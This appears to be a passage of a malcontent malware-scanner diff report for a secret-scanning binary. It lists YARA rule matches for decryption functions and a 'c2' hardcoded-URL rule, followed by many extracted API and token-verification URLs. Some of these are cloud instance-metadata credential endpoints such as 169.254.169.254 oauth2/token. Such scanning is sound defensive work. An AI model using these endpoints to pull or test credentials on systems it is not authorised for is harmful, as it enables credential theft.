[crypto/aes](https://github.com/search?q=crypto%2Faes&type=code) | -| LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [DecryptArgs](https://github.com/search?q=DecryptArgs&type=code)
[DecryptColumnEncryption](https://github.com/search?q=DecryptColumnEncryption&type=code)
[DecryptExplicit](https://github.com/search?q=DecryptExplicit&type=code)
[DecryptOAEP](https://github.com/search?q=DecryptOAEP&type=code)
[DecryptPEMBlock](https://github.com/search?q=DecryptPEMBlock&type=code)
[DecryptPKCS1v15SessionK](https://github.com/search?q=DecryptPKCS1v15SessionK&type=code)
[DecryptPrivateKeys](https://github.com/search?q=DecryptPrivateKeys&type=code)
[DecryptTicket](https://github.com/search?q=DecryptTicket&type=code)
[Decrypt_html_template_r](https://github.com/search?q=Decrypt_html_template_r&type=code)
[DecrypterInteract with](https://github.com/search?q=DecrypterInteract+with&type=code)
[DecrypterOpts](https://github.com/search?q=DecrypterOpts&type=code)
[DecryptionKeys](https://github.com/search?q=DecryptionKeys&type=code)
[GetDecryptedKey](https://github.com/search?q=GetDecryptedKey&type=code)
[NewCBCDecrypter](https://github.com/search?q=NewCBCDecrypter&type=code)
[NewCFBDecrypter](https://github.com/search?q=NewCFBDecrypter&type=code)
[NewECBDecrypter](https://github.com/search?q=NewECBDecrypter&type=code)
[NewOCFBDecrypter](https://github.com/search?q=NewOCFBDecrypter&type=code)
[PKCS1v15DecryptOptions](https://github.com/search?q=PKCS1v15DecryptOptions&type=code)
[aeadDecrypter](https://github.com/search?q=aeadDecrypter&type=code)
[cbcDecrypter](https://github.com/search?q=cbcDecrypter&type=code)
[decbDecrypter](https://github.com/search?q=decbDecrypter&type=code)
[ecDecrypterSigner](https://github.com/search?q=ecDecrypterSigner&type=code)
[edDecrypterSigner](https://github.com/search?q=edDecrypterSigner&type=code)
[lid options for Decryptcipher](https://github.com/search?q=lid+options+for+Decryptcipher&type=code)
[newAesDecryptReader](https://github.com/search?q=newAesDecryptReader&type=code)
[newDecrypter](https://github.com/search?q=newDecrypter&type=code)
[ocfbDecrypter](https://github.com/search?q=ocfbDecrypter&type=code)
[pkeDecrypt](https://github.com/search?q=pkeDecrypt&type=code)
[pter type in NewDecrypterPrivateKeyCoun](https://github.com/search?q=pter+type+in+NewDecrypterPrivateKeyCoun&type=code)
[rsaDecryptOk](https://github.com/search?q=rsaDecryptOk&type=code)
[rsaDecrypterSigner](https://github.com/search?q=rsaDecrypterSigner&type=code)
[vDecrypting column](https://github.com/search?q=vDecrypting+column&type=code)
[wecbDecrypter](https://github.com/search?q=wecbDecrypter&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://localhost/deprecated_featureconnection_failureprotocol_violationindicator_overflowrestrict_violationnot_null_violationcollation_mismatchundefined_functionduplicate_databaseduplicate_functionam](https://localhost/deprecated_featureconnection_failureprotocol_violationindicator_overflowrestrict_violationnot_null_violationcollation_mismatchundefined_functionduplicate_databaseduplicate_functionam)
[https://api.openai.com/v1/assistantsmail_settings.address_whitelist.readuser.multifactor_authentication.readadmin.conversations.convertToPrivateadmin.conversations.disconnectSharedadmin](https://api.openai.com/v1/assistantsmail_settings.address_whitelist.readuser.multifactor_authentication.readadmin.conversations.convertToPrivateadmin.conversations.disconnectSharedadmin)
[https://api.mailgun.net/v4/domainstracking_settings.google_analyticsmail_settings.plain_content.updatetemplates.versions.activate.createtemplates.versions.activate.deletetemplates](https://api.mailgun.net/v4/domainstracking_settings.google_analyticsmail_settings.plain_content.updatetemplates.versions.activate.createtemplates.versions.activate.deletetemplates)
[https://api.getpostman.com/meaccess_settings.activity.readmail_settings.template.updatesuppression.spam_reports.readsuppression.unsubscribes.readtracking_settings.open.updateuser](https://api.getpostman.com/meaccess_settings.activity.readmail_settings.template.updatesuppression.spam_reports.readsuppression.unsubscribes.readtracking_settings.open.updateuser)
[https://go.postman.co/workspaces/mail_settings.bounce_purge.updatemail_settings.forward_bounce.readmail_settings.forward_spam.updatepartner_settings.new_relic.updatesubusers](https://go.postman.co/workspaces/mail_settings.bounce_purge.updatemail_settings.forward_bounce.readmail_settings.forward_spam.updatepartner_settings.new_relic.updatesubusers)
[https://api.openai.com/v1/filesmail_settings.address_whitelistuser.multifactor_authenticationmail_settings.bounce_purge.readmail_settings.forward_spam.readpartner_settings](https://api.openai.com/v1/filesmail_settings.address_whitelistuser.multifactor_authenticationmail_settings.bounce_purge.readmail_settings.forward_spam.readpartner_settings)
[https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.netpostgres.database.chinacloudapi.cnhttps](https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.netdev.azuresynapse.usgovcloudapi.netpostgres.database.chinacloudapi.cnhttps)
[https://oauth2.mtls.googleapis.com/tokengrpc.io/server/received_messages_per_rpcgrpc.io/client/received_messages_per_rpcgrpclb](https://oauth2.mtls.googleapis.com/tokengrpc.io/server/received_messages_per_rpcgrpc.io/client/received_messages_per_rpcgrpclb)
[https://api.getpostman.com/workspacestracking_settings.subscription.updateworkflows.triggers.permissions.removehttps](https://api.getpostman.com/workspacestracking_settings.subscription.updateworkflows.triggers.permissions.removehttps)
[https://howtorotate.com/docs/tutorials/microsoftteams/.myfreshworks.com/crm/sales/api/sales_accounts/filtershttps](https://howtorotate.com/docs/tutorials/microsoftteams/.myfreshworks.com/crm/sales/api/sales_accounts/filtershttps)
[https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUSGOVERNMENTCLOUDAZURE_GO_SDK_LOG_LEVELnot](https://vault.azure.cnazuretrafficmanager.deservicebus.cloudapi.deAZUREUSGOVERNMENTCLOUDAZURE_GO_SDK_LOG_LEVELnot)
[https://github.com/pygments/pygments/blob/15f222adefd2bf7835bfd74a12d720028ae68d29/pygments/lexers/dalvik.py.](https://github.com/pygments/pygments/blob/15f222adefd2bf7835bfd74a12d720028ae68d29/pygments/lexers/dalvik.py.)
[https://iamcredentials.mtls.googleapis.com/buffered_file_writer_total_write_size_byteshash/adler32](https://iamcredentials.mtls.googleapis.com/buffered_file_writer_total_write_size_byteshash/adler32)
[https://batch.cloudapi.de/mysql.database.cloudapi.decloudapp.microsoftazure.denegative](https://batch.cloudapi.de/mysql.database.cloudapi.decloudapp.microsoftazure.denegative)
[https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/LA](https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/LA)
[https://api.simplynoted.com/api/productsfakeTruffleHogAccessTokenForVerificationhttps](https://api.simplynoted.com/api/productsfakeTruffleHogAccessTokenForVerificationhttps)
[https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_record_summaries](https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_record_summaries)
[https://api.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoftazure.denot](https://api.loganalytics.usservicebus.chinacloudapi.cndocuments.microsoftazure.denot)
[https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudapi.nethttps](https://storage.azure.com/database.usgovcloudapi.netcloudapp.usgovcloudapi.nethttps)
[https://api.airbrake.io/api/v4/projects/grant_type=client_credentials&client_id=ht](https://api.airbrake.io/api/v4/projects/grant_type=client_credentials&client_id=ht)
[https://app.caflou.com/api/v1/accounts.currencycloud.com/v2/authenticate/apihttps](https://app.caflou.com/api/v1/accounts.currencycloud.com/v2/authenticate/apihttps)
[https://howtorotate.com/docs/tutorials/netlify//services/rest/record/v1/metadata](https://howtorotate.com/docs/tutorials/netlify//services/rest/record/v1/metadata)
[https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_records](https://api.stripe.com/v1/subscription_items/nowaythiscanexist/usage_records)
[https://api.stripe.com/v1/billing/meters/nowaythiscanexist/event_summaries](https://api.stripe.com/v1/billing/meters/nowaythiscanexist/event_summaries)
[https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps](https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps)
[https://statuspal.io/api/v1/status_pages/secretscanner/subscriptionshttps](https://statuspal.io/api/v1/status_pages/secretscanner/subscriptionshttps)
[https://api.telnyx.com/v2/messaging_profilesapplication/vnd.tickettailor](https://api.telnyx.com/v2/messaging_profilesapplication/vnd.tickettailor)
[https://docs.stripe.com/api/usage_records/subscription_item_summary_list](https://docs.stripe.com/api/usage_records/subscription_item_summary_list)
[https://api.stripe.com/v1/tax/calculations/nowaycanthisexist/line_items](https://api.stripe.com/v1/tax/calculations/nowaycanthisexist/line_items)
[https://gallery.chinacloudapi.cn/mariadb.database.chinacloudapi.cnhttps](https://gallery.chinacloudapi.cn/mariadb.database.chinacloudapi.cnhttps)
[https://anypoint.mulesoft.com/apiplatform/repository/v2/organizations/](https://anypoint.mulesoft.com/apiplatform/repository/v2/organizations/)
[https://api.flightstats.com/flex/aircraft/rest/v1/json/availableFields](https://api.flightstats.com/flex/aircraft/rest/v1/json/availableFields)
[https://app.snipcart.com/api/ordersgrant_type=refresh_token&client_id=](https://app.snipcart.com/api/ordersgrant_type=refresh_token&client_id=)
[https://cloud.viewneo.com/api/v1.0/playlistapplication/vnd.zipcodebase](https://cloud.viewneo.com/api/v1.0/playlistapplication/vnd.zipcodebase)
[https://developer.api.autodesk.com/authentication/v1/authenticateimage](https://developer.api.autodesk.com/authentication/v1/authenticateimage)
[https://api.apifonica.com/v2/accounts&my=true&offset=10&limit=99&desc](https://api.apifonica.com/v2/accounts&my=true&offset=10&limit=99&desc)
[https://hub.docker.com/v2/users/loginapplication/vnd.dyspatch.2020.11](https://hub.docker.com/v2/users/loginapplication/vnd.dyspatch.2020.11)
[https://api.stripe.com/v1/application_fees/nowaythiscanexist/refunds](https://api.stripe.com/v1/application_fees/nowaythiscanexist/refunds)
[https://dataservice.accuweather.com/locations/v1/cities/autocomplete](https://dataservice.accuweather.com/locations/v1/cities/autocomplete)
[https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp](https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttp)
[https://api.stripe.com/v1/terminal/configurations/nowaythiscanexist](https://api.stripe.com/v1/terminal/configurations/nowaythiscanexist)
[https://batch.chinacloudapi.cn/mysql.database.chinacloudapi.cnhttps](https://batch.chinacloudapi.cn/mysql.database.chinacloudapi.cnhttps)
[https://api.eu.newrelic.com/v2/users.jsonapplication/vnd.onesignal](https://api.eu.newrelic.com/v2/users.jsonapplication/vnd.onesignal)
[https://api.rocketreach.co/v2/api/accountapplication/vnd.semaphore](https://api.rocketreach.co/v2/api/accountapplication/vnd.semaphore)
[https://api.stripe.com/v1/issuing/authorizations/nowaythiscanexist](https://api.stripe.com/v1/issuing/authorizations/nowaythiscanexist)
[https://trufflesecurity.com/canariesDefaultEndpointsProtocol=https](https://trufflesecurity.com/canariesDefaultEndpointsProtocol=https)
[https://api.overloop.com/public/v1/usersapplication/vnd.pagerduty](https://api.overloop.com/public/v1/usersapplication/vnd.pagerduty)
[https://api.uclassify.com/v1/uClassify/Sentiment/classifyReceived](https://api.uclassify.com/v1/uClassify/Sentiment/classifyReceived)
[https://docs.stripe.com/api/identity/verification_sessions/create](https://docs.stripe.com/api/identity/verification_sessions/create)
[https://www.meistertask.com/api/projectsapplication/vnd.moonclerk](https://www.meistertask.com/api/projectsapplication/vnd.moonclerk)
[http://169.254.169.254/latestProcessProviderExecutionErrorfailed](http://169.254.169.254/latestProcessProviderExecutionErrorfailed)
[https://api.delighted.com/v1/people.jsonapplication/vnd.docusign](https://api.delighted.com/v1/people.jsonapplication/vnd.docusign)
[https://api.kraken.com/0/private/Balanceapplication/vnd.loadmill](https://api.kraken.com/0/private/Balanceapplication/vnd.loadmill)
[https://api.stormboard.com/users/profileapplication/vnd.timecamp](https://api.stormboard.com/users/profileapplication/vnd.timecamp)
[https://api.stripe.com/v1/issuing/transactions/nowaythiscanexist](https://api.stripe.com/v1/issuing/transactions/nowaythiscanexist)
[https://backboard.railway.app/graphql/v2application/vnd.sugester](https://backboard.railway.app/graphql/v2application/vnd.sugester)
[https://manage.windowsazure.us/publishsettings/indexunrecognized](https://manage.windowsazure.us/publishsettings/indexunrecognized)
[https://mltb8350.hiveage.com/api/networkapplication/vnd.hybiscus](https://mltb8350.hiveage.com/api/networkapplication/vnd.hybiscus)
[https://platform.devtest.ringcentral.com/restapi/oauth/authorize](https://platform.devtest.ringcentral.com/restapi/oauth/authorize)
[https://www.googleapis.com/auth/devstorage.read_writecredentials](https://www.googleapis.com/auth/devstorage.read_writecredentials)
[https://api.stripe.com/v1/confirmation_tokens/nowaythiscanexist](https://api.stripe.com/v1/confirmation_tokens/nowaythiscanexist)
[https://api.stripe.com/v1/issuing/cardholders/nowaythiscanexist](https://api.stripe.com/v1/issuing/cardholders/nowaythiscanexist)
[https://database.windows.net/postgres.database.cloudapi.dehttps](https://database.windows.net/postgres.database.cloudapi.dehttps)
[https://docs.stripe.com/api/identity/verification_sessions/list](https://docs.stripe.com/api/identity/verification_sessions/list)
[https://docs.stripe.com/api/issuing/funding_instructions/create](https://docs.stripe.com/api/issuing/funding_instructions/create)
[https://api.stytch.com/v1/users/pendingapplication/vnd.tatumio](https://api.stytch.com/v1/users/pendingapplication/vnd.tatumio)
[https://api.twitter.com/oauth2/tokenapplication/vnd.uploadcare](https://api.twitter.com/oauth2/tokenapplication/vnd.uploadcare)
[https://app.magnetichq.com/Magnetic/rest/accountsAPI/itemTypes](https://app.magnetichq.com/Magnetic/rest/accountsAPI/itemTypes)
[https://docs.stripe.com/api/payment_links/payment_links/create](https://docs.stripe.com/api/payment_links/payment_links/create)
[https://gallery.cloudapi.de/mariadb.database.cloudapi.defailed](https://gallery.cloudapi.de/mariadb.database.cloudapi.defailed)
[https://www.googleapis.com/auth/devstorage.full_controlstorage](https://www.googleapis.com/auth/devstorage.full_controlstorage)
[https://api.stripe.com/v1/tax/registrations/nowaycanthisexist](https://api.stripe.com/v1/tax/registrations/nowaycanthisexist)
[https://apiv2.bitcoinaverage.com/websocket/v3/get_tickethttps](https://apiv2.bitcoinaverage.com/websocket/v3/get_tickethttps)
[https://coveralls.io/api/repos/github/secretscanner02/scanner](https://coveralls.io/api/repos/github/secretscanner02/scanner)
[https://dictionary.yandex.net/api/v1/dicservice.json/getLangs](https://dictionary.yandex.net/api/v1/dicservice.json/getLangs)
[https://docs.stripe.com/api/issuing/funding_instructions/list](https://docs.stripe.com/api/issuing/funding_instructions/list)
[https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps](https://managedhsm.azure.netservicebus.usgovcloudapi.nethttps)
[https://www.googleapis.com/auth/devstorage.read_onlywildcards](https://www.googleapis.com/auth/devstorage.read_onlywildcards)
[https://api.optimizely.com/v2/projectsapplication/vnd.planyo](https://api.optimizely.com/v2/projectsapplication/vnd.planyo)
[https://api.stripe.com/v1/issuing/disputes/nowaythiscanexist](https://api.stripe.com/v1/issuing/disputes/nowaythiscanexist)
[https://docs.stripe.com/api/payment_links/payment_links/list](https://docs.stripe.com/api/payment_links/payment_links/list)
[https://api.apilayer.com/number_verification/countrieshttps](https://api.apilayer.com/number_verification/countrieshttps)
[https://api.storecove.com/api/v2/discovery/identifiershttps](https://api.storecove.com/api/v2/discovery/identifiershttps)
[https://api.stripe.com/v1/payment_methods/nowaycanthisexist](https://api.stripe.com/v1/payment_methods/nowaycanthisexist)
[https://api.stripe.com/v1/reviews/nowaycanthisexist/approve](https://api.stripe.com/v1/reviews/nowaycanthisexist/approve)
[https://api.tiingo.com/tiingo/fundamentals/definitionshttps](https://api.tiingo.com/tiingo/fundamentals/definitionshttps)
[https://budibase.app/api/public/v1/applications/searchhttps](https://budibase.app/api/public/v1/applications/searchhttps)
[https://docs.stripe.com/api/confirmation_tokens/test_create](https://docs.stripe.com/api/confirmation_tokens/test_create)
[https://docs.stripe.com/api/customer_portal/sessions/create](https://docs.stripe.com/api/customer_portal/sessions/create)
[https://docs.stripe.com/api/issuing/authorizations/retrieve](https://docs.stripe.com/api/issuing/authorizations/retrieve)
[https://industrial.api.ubidots.com/api/v1.6/variables/https](https://industrial.api.ubidots.com/api/v1.6/variables/https)
[https://manage.chinacloudapi.com/publishsettings/indexhttps](https://manage.chinacloudapi.com/publishsettings/indexhttps)
[https://services.reachmail.net/administration/users/current](https://services.reachmail.net/administration/users/current)
[http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2](http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2)
[https://api.ngrok.com/agent_ingressesapplication/vnd.nylas](https://api.ngrok.com/agent_ingressesapplication/vnd.nylas)
[https://api.rs2.usw2.rockset.com/v1/orgs/self/querieshttps](https://api.rs2.usw2.rockset.com/v1/orgs/self/querieshttps)
[https://api.sandbox.signaturit.com/v3/signatures.jsonhttps](https://api.sandbox.signaturit.com/v3/signatures.jsonhttps)
[https://api.stripe.com/v1/issuing/tokens/nowaythiscanexist](https://api.stripe.com/v1/issuing/tokens/nowaythiscanexist)
[https://api.stripe.com/v1/test_helpers/confirmation_tokens](https://api.stripe.com/v1/test_helpers/confirmation_tokens)
[https://example.teamwork.com/desk/api/v2/me.jsonRepository](https://example.teamwork.com/desk/api/v2/me.jsonRepository)
[https://example.teamwork.com/spaces/api/v1/users.jsonhttps](https://example.teamwork.com/spaces/api/v1/users.jsonhttps)
[https://gen.duply.co/v1/usagegrant_type=client_credentials](https://gen.duply.co/v1/usagegrant_type=client_credentials)
[https://login.eagleeyenetworks.com/g/aaa/authenticatehttps](https://login.eagleeyenetworks.com/g/aaa/authenticatehttps)
[https://manage.microsoftazure.de/publishsettings/indexhttp](https://manage.microsoftazure.de/publishsettings/indexhttp)
[https://pastebin.com/api/api_post.phpapplication/vnd.percy](https://pastebin.com/api/api_post.phpapplication/vnd.percy)
[https://test.api.amadeus.com/v1/security/oauth2/tokenhttps](https://test.api.amadeus.com/v1/security/oauth2/tokenhttps)
[http://schemas.microsoft.com/3dmanufacturing/core/2015/02](http://schemas.microsoft.com/3dmanufacturing/core/2015/02)
[https://api.copper.com/developer_api/v1/tasks/searchhttps](https://api.copper.com/developer_api/v1/tasks/searchhttps)
[https://api.stripe.com/v1/billing/meter_event_adjustments](https://api.stripe.com/v1/billing/meter_event_adjustments)
[https://api.stripe.com/v1/issuing/cards/nowaythiscanexist](https://api.stripe.com/v1/issuing/cards/nowaythiscanexist)
[https://api.stripe.com/v1/setup_intents/nowaycanthisexist](https://api.stripe.com/v1/setup_intents/nowaycanthisexist)
[https://api.worldweatheronline.com/premium/v1/search.ashx](https://api.worldweatheronline.com/premium/v1/search.ashx)
[https://cloud.google.com/docs/authentication/external/set](https://cloud.google.com/docs/authentication/external/set)
[https://docs.stripe.com/api/issuing/authorizations/update](https://docs.stripe.com/api/issuing/authorizations/update)
[https://docs.stripe.com/api/issuing/transactions/retrieve](https://docs.stripe.com/api/issuing/transactions/retrieve)
[https://docs.stripe.com/api/payment_method_domains/create](https://docs.stripe.com/api/payment_method_domains/create)
[https://docs.stripe.com/api/terminal/configuration/update](https://docs.stripe.com/api/terminal/configuration/update)
[https://geoip.maxmind.com/geoip/v2.1/country/8.8.8.8https](https://geoip.maxmind.com/geoip/v2.1/country/8.8.8.8https)
[https://graph.windows.net/mariadb.database.azure.comhttps](https://graph.windows.net/mariadb.database.azure.comhttps)
[https://moderationapi.com/api/v1/analyze/languagePostgres](https://moderationapi.com/api/v1/analyze/languagePostgres)
[https://api.avaza.com/api/Account.blob.core.windows.net/](https://api.avaza.com/api/Account.blob.core.windows.net/)
[https://api.cloudmersive.com/validate/address/parsehttps](https://api.cloudmersive.com/validate/address/parsehttps)
[https://api.ecostruxureit.com/rest/v1/organizationshttps](https://api.ecostruxureit.com/rest/v1/organizationshttps)
[https://api.rechargeapps.com/token_information&url=https](https://api.rechargeapps.com/token_information&url=https)
[https://api.stripe.com/v1/credit_notes/nowaythiscanexsit](https://api.stripe.com/v1/credit_notes/nowaythiscanexsit)
[https://api.stripe.com/v1/identity/verification_sessions](https://api.stripe.com/v1/identity/verification_sessions)
[https://api.thinkific.com/api/public/v1/collectionshttps](https://api.thinkific.com/api/public/v1/collectionshttps)
[https://api.twist.com/api/v3/users/get_session_userhttps](https://api.twist.com/api/v3/users/get_session_userhttps)
[https://cicero.azavea.com/v3.1/account/credits_remaining](https://cicero.azavea.com/v3.1/account/credits_remaining)
[https://docs.stripe.com/api/confirmation_tokens/retrieve](https://docs.stripe.com/api/confirmation_tokens/retrieve)
[https://docs.stripe.com/api/issuing/cardholders/retrieve](https://docs.stripe.com/api/issuing/cardholders/retrieve)
[https://howtorotate.com/docs/tutorials/sourcegraph/https](https://howtorotate.com/docs/tutorials/sourcegraph/https)
[https://manage.windowsazure.com/publishsettings/indexraw](https://manage.windowsazure.com/publishsettings/indexraw)
[https://track.customer.io/api/v1/customers/5/eventshttps](https://track.customer.io/api/v1/customers/5/eventshttps)
[https://api.cloudflare.com/client/v4/user/tokens/verify](https://api.cloudflare.com/client/v4/user/tokens/verify)
[https://api.elasticemail.com/v2/account/profileoverview](https://api.elasticemail.com/v2/account/profileoverview)
[https://api.magicbell.com/notification_preferenceshttps](https://api.magicbell.com/notification_preferenceshttps)
[https://app.vagrantup.com/api/v2/authenticateunexpected](https://app.vagrantup.com/api/v2/authenticateunexpected)
[https://docs.stripe.com/api/issuing/transactions/update](https://docs.stripe.com/api/issuing/transactions/update)
[https://docs.stripe.com/api/payment_method_domains/list](https://docs.stripe.com/api/payment_method_domains/list)
[https://docs.stripe.com/api/tax/calculations/line_items](https://docs.stripe.com/api/tax/calculations/line_items)
[https://docs.stripe.com/api/terminal/configuration/list](https://docs.stripe.com/api/terminal/configuration/list)
[https://example.teamwork.com/crm/api/v2/users.jsonhttps](https://example.teamwork.com/crm/api/v2/users.jsonhttps)
[https://formio.form.io/currentapplication/vnd.github.v3](https://formio.form.io/currentapplication/vnd.github.v3)
[https://howtorotate.com/docs/tutorials/elevenlabs/https](https://howtorotate.com/docs/tutorials/elevenlabs/https)
[https://howtorotate.com/docs/tutorials/railwayapp/https](https://howtorotate.com/docs/tutorials/railwayapp/https)
[https://microsoftgraph.chinacloudapi.cn/server_duration](https://microsoftgraph.chinacloudapi.cn/server_duration)
[https://platform.segmentapis.com/v1beta/workspaceshttps](https://platform.segmentapis.com/v1beta/workspaceshttps)
[https://api.blocknative.com/gasprices/blockpriceshttps](https://api.blocknative.com/gasprices/blockpriceshttps)
[https://api.dropboxapi.com/2/users/get_current_account](https://api.dropboxapi.com/2/users/get_current_account)
[https://api.postageapp.com/v.1.0/get_account_info.json](https://api.postageapp.com/v.1.0/get_account_info.json)
[https://api.stripe.com/v1/issuing/funding_instructions](https://api.stripe.com/v1/issuing/funding_instructions)
[https://api.textanywhere.com/API/v1.0/REST/statushttps](https://api.textanywhere.com/API/v1.0/REST/statushttps)
[https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png](https://api.tomtom.com/map/1/tile/basic/main/0/0/0.png)
[https://connect.squareupsandbox.com/oauth2/revokehttps](https://connect.squareupsandbox.com/oauth2/revokehttps)
[https://console.jumpcloud.com/api/v2/systemgroupshttps](https://console.jumpcloud.com/api/v2/systemgroupshttps)
[https://docs.stripe.com/api/issuing/cardholders/create](https://docs.stripe.com/api/issuing/cardholders/create)
[https://howtorotate.com/docs/tutorials/atlassian/https](https://howtorotate.com/docs/tutorials/atlassian/https)
[https://howtorotate.com/docs/tutorials/mailchimp/https](https://howtorotate.com/docs/tutorials/mailchimp/https)
[https://howtorotate.com/docs/tutorials/sumologic/https](https://howtorotate.com/docs/tutorials/sumologic/https)
[https://pdflayer.com/downloads/invoice.htmlPlanetScale](https://pdflayer.com/downloads/invoice.htmlPlanetScale)
[https://storage.mtls.googleapis.com/storage/v1/storage](https://storage.mtls.googleapis.com/storage/v1/storage)
[https://weather.ls.hereapi.com/weather/1.0/report.json](https://weather.ls.hereapi.com/weather/1.0/report.json)
[https://www.googleapis.com/auth/devstorage.read_writeB](https://www.googleapis.com/auth/devstorage.read_writeB)
[https://www.happyscribe.com/api/v1/transcriptionshttps](https://www.happyscribe.com/api/v1/transcriptionshttps)
[https://www.mongodb.com/supportability/documentdbAzure](https://www.mongodb.com/supportability/documentdbAzure)
[https://www.protocols.io/api/v3/session/profilerequest](https://www.protocols.io/api/v3/session/profilerequest)
[http://169.254.169.254/metadata/identity/oauth2/token](http://169.254.169.254/metadata/identity/oauth2/token)
[https://api.centralstationcrm.net/api/users.jsonhttps](https://api.centralstationcrm.net/api/users.jsonhttps)
[https://api.mavenlink.com/api/v1/workspaces.jsonhttps](https://api.mavenlink.com/api/v1/workspaces.jsonhttps)
[https://api.parsers.dev/api/v1/parse/postgresql/https](https://api.parsers.dev/api/v1/parse/postgresql/https)
[https://api.partnerstack.com/api/v2/partnershipshttps](https://api.partnerstack.com/api/v2/partnershipshttps)
[https://api.stripe.com/v1/customers/nowaythiscanexist](https://api.stripe.com/v1/customers/nowaythiscanexist)
[https://app.onedesk.com/rest/2.0/login/loginUserhttps](https://app.onedesk.com/rest/2.0/login/loginUserhttps)
[https://app.ticketmaster.com/discovery/v2/events.json](https://app.ticketmaster.com/discovery/v2/events.json)
[https://connect.squareupsandbox.com/v2/merchantshttps](https://connect.squareupsandbox.com/v2/merchantshttps)
[https://docs.stripe.com/api/issuing/disputes/retrieve](https://docs.stripe.com/api/issuing/disputes/retrieve)
[https://docs.stripe.com/api/reporting/report_run/list](https://docs.stripe.com/api/reporting/report_run/list)
[https://docs.stripe.com/api/terminal/locations/create](https://docs.stripe.com/api/terminal/locations/create)
[https://gitlab.com/api/v4/personal_access_tokens/self](https://gitlab.com/api/v4/personal_access_tokens/self)
[https://howtorotate.com/docs/tutorials/airbrake/https](https://howtorotate.com/docs/tutorials/airbrake/https)
[https://howtorotate.com/docs/tutorials/sendbird/https](https://howtorotate.com/docs/tutorials/sendbird/https)
[https://howtorotate.com/docs/tutorials/sendgrid/https](https://howtorotate.com/docs/tutorials/sendgrid/https)
[https://trackapi.nutritionix.com/v2/natural/nutrients](https://trackapi.nutritionix.com/v2/natural/nutrients)
[https://vault.azure.net/mysql.database.azure.comhttps](https://vault.azure.net/mysql.database.azure.comhttps)
[https://www.carboninterface.com/api/v1/estimateshttps](https://www.carboninterface.com/api/v1/estimateshttps)
[https://www.googleapis.com/youtube/v3/channelSections](https://www.googleapis.com/youtube/v3/channelSections)
[https://api.api2cart.com/v1.1/account.cart.list.json](https://api.api2cart.com/v1.1/account.cart.list.json)
[https://api.developer.coinbase.com/waas/pools/protoc](https://api.developer.coinbase.com/waas/pools/protoc)
[https://api.glassnode.com/v1/metrics/indicators/sopr](https://api.glassnode.com/v1/metrics/indicators/sopr)
[https://api.instabot.io/v1spring.datasource.password](https://api.instabot.io/v1spring.datasource.password)
[https://api.openai.com/v1/modelsuser.scheduled_sends](https://api.openai.com/v1/modelsuser.scheduled_sends)
[https://api.stripe.com/v1/disputes/nowaycanthisexist](https://api.stripe.com/v1/disputes/nowaycanthisexist)
[https://api.teletype.app/public/api/v1/messageshttps](https://api.teletype.app/public/api/v1/messageshttps)
[https://app.terraform.io/api/v2/account/detailshttps](https://app.terraform.io/api/v2/account/detailshttps)
[https://connect.squareup.com/oauth2/token/statusx509](https://connect.squareup.com/oauth2/token/statusx509)
[https://docs.stripe.com/api/checkout/sessions/create](https://docs.stripe.com/api/checkout/sessions/create)
[https://docs.stripe.com/api/customer_sessions/create](https://docs.stripe.com/api/customer_sessions/create)
[https://docs.stripe.com/api/tax/registrations/update](https://docs.stripe.com/api/tax/registrations/update)
[https://docs.stripe.com/api/webhook_endpoints/create](https://docs.stripe.com/api/webhook_endpoints/create)
[https://gist.github.comMetaDataValidationErrorunable](https://gist.github.comMetaDataValidationErrorunable)
[https://howtorotate.com/docs/tutorials/maxmind/https](https://howtorotate.com/docs/tutorials/maxmind/https)
[https://rendyplayground.simvoly.com/api/site/members](https://rendyplayground.simvoly.com/api/site/members)
[https://www.browserstack.com/automate/plan.jsonhttps](https://www.browserstack.com/automate/plan.jsonhttps)
[http://metadata/computeMetadata/v1/instance/service](http://metadata/computeMetadata/v1/instance/service)
[https://api.skybiometry.com/fc/account/authenticate](https://api.skybiometry.com/fc/account/authenticate)
[https://api.stripe.com/v1/sources/nowaycanthisexist](https://api.stripe.com/v1/sources/nowaycanthisexist)
[https://apiv4.reallysimplesystems.com/accountshttps](https://apiv4.reallysimplesystems.com/accountshttps)
[https://docs.stripe.com/api/issuing/disputes/update](https://docs.stripe.com/api/issuing/disputes/update)
[https://docs.stripe.com/api/issuing/tokens/retrieve](https://docs.stripe.com/api/issuing/tokens/retrieve)
[https://docs.stripe.com/api/tax/calculations/create](https://docs.stripe.com/api/tax/calculations/create)
[https://docs.stripe.com/api/terminal/locations/list](https://docs.stripe.com/api/terminal/locations/list)
[https://docs.stripe.com/api/terminal/readers/create](https://docs.stripe.com/api/terminal/readers/create)
[https://github.com/login/oauth/access_tokenexpected](https://github.com/login/oauth/access_tokenexpected)
[https://howtorotate.com/docs/tutorials/eraser/https](https://howtorotate.com/docs/tutorials/eraser/https)
[https://howtorotate.com/docs/tutorials/github/https](https://howtorotate.com/docs/tutorials/github/https)
[https://howtorotate.com/docs/tutorials/gitlab/https](https://howtorotate.com/docs/tutorials/gitlab/https)
[https://howtorotate.com/docs/tutorials/square/https](https://howtorotate.com/docs/tutorials/square/https)
[https://howtorotate.com/docs/tutorials/stripe/https](https://howtorotate.com/docs/tutorials/stripe/https)
[https://keychecker.trufflesecurity.com/fingerprint/](https://keychecker.trufflesecurity.com/fingerprint/)
